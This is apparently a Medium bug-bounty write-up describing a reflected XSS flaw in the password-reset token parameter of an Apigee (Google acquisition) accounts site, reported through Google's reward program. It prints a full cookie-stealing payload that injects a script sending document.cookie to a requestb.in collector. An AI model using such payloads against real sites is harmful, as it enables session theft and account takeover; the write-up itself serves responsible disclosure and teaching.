Google Acquisition XSS (Apigee)

So when I was trying to verify some Google acquisition website

I enter apigee.com which provides API management, so as always I start my burp suite and I try to verify all the functions as possible,

On the first try, everything was secure and all my first test failed, but as a bug hunter it should not be 100% secure and nothing is safe, So I log out and start to check the login and register option, look all right here

at some point, I tried to check the password reset action, get a link in my email account that looks like this

reset password email

link :

https://api.accounts.apigee.com/management/users/[REDACTED]/resetpw?token=ZW0tsHaU-REDACTED-eeTDi2YRIN1CICmFjOSSE2JvllO_-REDACTED-

Here, I have the idea to try to bypass the token and obtain a valid link for all users, which allows me to update any user password, but this failed too and can’t bypass it

when I was trying to edit the link and change the token code, I saw something normal for me, it looks like this entry has not been filtered here, so I tried to send some XSS payload as a test.

source code page
XSS POC alert
XSS change index page

And here where things begin 😃

let's steal some cookies 😍

as it's not legal to hack someone account, I tested in my own account

create first the payload :

https://api.accounts.apigee.com/management/users/xxxxxx/resetpw?token=xxxxxxx"><script>new Image().src=’https://requestb.in/xxxxxx?code='+document.cookie</script><a href=”

ON CLICK & All cookies will be sent to us😅

request in requestb.in

Report time, I submitted this using their VRP program. I got the following mail

Jul 11, 2017: “Nice catch!” answer 😍 love these words

Security Analyst

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store